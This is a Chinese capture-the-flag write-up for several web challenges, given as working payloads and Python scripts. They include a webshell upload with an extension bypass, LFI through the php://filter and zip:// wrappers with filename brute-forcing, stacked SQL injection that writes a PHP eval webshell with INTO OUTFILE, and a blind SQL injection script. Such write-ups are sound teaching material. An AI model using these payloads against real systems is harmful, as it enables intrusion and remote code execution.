手速要快
在header中发现password
然后来到上传界面,上传一句话,bp抓包后缀加上.jpg
访问发现解析为php
getshell 读取flagflag{698539765730b69026796420b9201e03}
image_up
打开以后发现url有page=猜测存在文件包含
测试php伪协议http://101.71.29.5:10007/index.php?page=php://filter/convert.base64-encode/resource=index
读到源码
<?php
if(isset($_GET['page'])){
if(!stristr($_GET['page'],"..")){
$page = $_GET['page'].".php";
include($page);
}else{
header("Location: index.php?page=login");
}
}else{
header("Location: index.php?page=login");
}
会在url后加.php
随手测试登陆发现能登陆,进入上传界面,再读upload源码
<?php
$error = "";
$exts = array("jpg","png","gif","jpeg");
if(!empty($_FILES["image"]))
{
$temp = explode(".", $_FILES["image"]["name"]);
$extension = end($temp);
if((@$_upfileS["image"]["size"] < 102400))
{
if(in_array($extension,$exts)){
$path = "uploads/".md5($temp[0].time()).".".$extension;
move_uploaded_file($_FILES["image"]["tmp_name"], $path);
$error = "涓婁紶鎴愬姛!";
}
else{
$error = "涓婁紶澶辫触锛�";
}
}else{
$error = "鏂囦欢杩囧ぇ锛屼笂浼犲け璐ワ紒";
}
}
?>
发现文件上传想到 lfi+upload,上传一个内容带有一句话木马的jpg,再包含即可getshell根据$path = "uploads/".md5($temp[0].time()).".".$extension;可以预测上传文件名
由于index中强行拼接.php
想到利用zip伪协议
写个php一句话,压缩为zip,再改后缀jpg,上传jpg
脚本**文件名
import time
import requests
import hashlib
url = "http://101.71.29.5:10007/"
def md5(str):
m = hashlib.md5()
m.update(str)
return m.hexdigest()
files = {
"image":("coold.jpg",open("1.zip","rb"))
}
t = int(time.time())+8*3600
requests.post(url=url+"index.php?page=upload",files=files)
for i in range(t-200,t+200):
path = "uploads/"+md5("coold"+str(i))+".jpg"
status = requests.get(url=url+path).status_code
if status == 200:
print path
break
PS:这里服务器时差8h是真的坑
爆出文件名,访问
http://101.71.29.5:10007/index.php?page=zip://./uploads/4d1fdcca6693db54aae0b2d92cf8eda5.jpg%23coold
这里由于是zip所以用%23截断然后写入压缩包文件名,强行拼接.php所以只写coold就可
如果用phar协议需要把%23换成/
拿到shell执行命令读flag即可
flag{3809f2ce999b4d99c8051e285505a014}
write a shell
在用户信息处发现注入点,存在魔术引号和非法字符串替换
过滤了@ 利用waf漏洞^会转化为@
先查看用户权限 sql语句
select GRANTEE,PRIVILEGE_TYPE,3,4,IS_GRANTABLE from information_schema.USER_PRIVILEGES
payload
http://101.71.29.5:10011/user/user.php?id=24;set^s=concat(CHAR(115, 101, 108, 101, 99, 116, 32, 71, 82, 65, 78, 84, 69, 69, 44, 80, 82, 73, 86, 73, 76, 69, 71, 69, 95, 84, 89, 80, 69, 44, 51, 44, 52, 44, 73, 83, 95, 71, 82, 65, 78, 84, 65, 66, 76, 69, 32, 102, 114, 111, 109, 32, 105, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 95, 115, 99, 104, 101, 109, 97, 46, 85, 83, 69, 82, 95, 80, 82, 73, 86, 73, 76, 69, 71, 69, 83));PREPARE a FROM^s;EXECUTE a;
该用户存在文件读写权限
查看文件读写路径 sql语句
show variables like '%secure_file_priv%'
payload
http://101.71.29.5:10011/user/user.php?id=24;set^s=concat(CHAR(115, 104, 111, 119, 32, 118, 97, 114, 105, 97, 98, 108, 101, 115, 32, 108, 105, 107, 101, 32, 39, 37, 115, 101, 99, 117, 114, 101, 95, 102, 105, 108, 101, 95, 112, 114, 105, 118, 37, 39, 10));PREPARE a FROM^s;EXECUTE a;
写入一句话 sql语句
select'<?php eval($_POST[coold]);?>'into outfile '/var/www/html/favicon/coold.php'
payload
http://101.71.29.5:10011/user/user.php?id=24;set^s=concat(CHAR(115, 101, 108, 101, 99, 116, 39, 60, 63, 112, 104, 112, 32, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 111, 111, 108, 100, 93, 41, 59, 63, 62, 39, 105, 110, 116, 111, 32, 111, 117, 116, 102, 105, 108, 101, 32, 39, 47, 118, 97, 114, 47, 119, 119, 119, 47, 104, 116, 109, 108, 47, 102, 97, 118, 105, 99, 111, 110, 47, 99, 111, 111, 108, 100, 46, 112, 104, 112, 39));PREPARE a FROM^s;EXECUTE a;
访问http://101.71.29.5:10011/favicon/coold.php
getshell
flag{f6c5acfd4192b4152661d19b411d2d63}
ezsql
load_file读文件
好黑的黑名单
拿到题目,f12发现
http://101.71.29.5:10041/show.php?id=1
于是尝试注入,有了前面的经验,直接尝试
http://101.71.29.5:10008/show.php?id=if(1,1,2)
http://101.71.29.5:10008/show.php?id=if(0,1,2)
并且发现过滤时
报错时
即可得到题目的4种特征
尝试
if((database())like(0x25),1,2)
发现like被过滤,于是尝试regexp
if((database)regexp(0x5e),1,2)
fuzz了一下,发现可以得到数据库名为
web
于是写脚本进行注入
尝试爆表
select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()
这里遇到问题,=被过滤,like也被过滤 于是想到
in(database())
但是这里还有坑,需要这样绕过
in%0a(database())
同时information_schema.TABLES被过滤,需要如下绕过
information_schema%0a.%0aTABLES
绕过后,即可得到两张表
admin,flaggg
相同的方式尝试爆字段
id,f1agg
最后进行flag的提取时出现问题,题目不知道为什么,当regexp匹配数字的时候,就会出现数据库错误
所以只能得到flag{
想到使用between
根据之前的经验,flag均为md5
于是想到从0~f进行遍历
# -*- coding:utf-8 -*-
import requests
import string
flag = 'flag{'
payload=flag.encode('hex')
list = string.digits+'abcdef'+'}'
for i in range(1,200):
for j in range(len(list)):
tmp1 = payload+'2f'
tmp2 = payload+list[j].encode('hex')
url = 'http://101.71.29.5:10008/show.php?id=if(((select%0af1agg%0afrom%0aflaggg)between%0a0x'+tmp1+'%0aand%0a0x'+tmp2+'),1,2)'
r = requests.get(url)
if '郑州烩面的价钱为10' in r.content:
payload += list[j-1].encode('hex')
print payload.decode('hex')
break
flag{5d6352163c30ba51f1e2c0dd08622428}
interesting web
orz…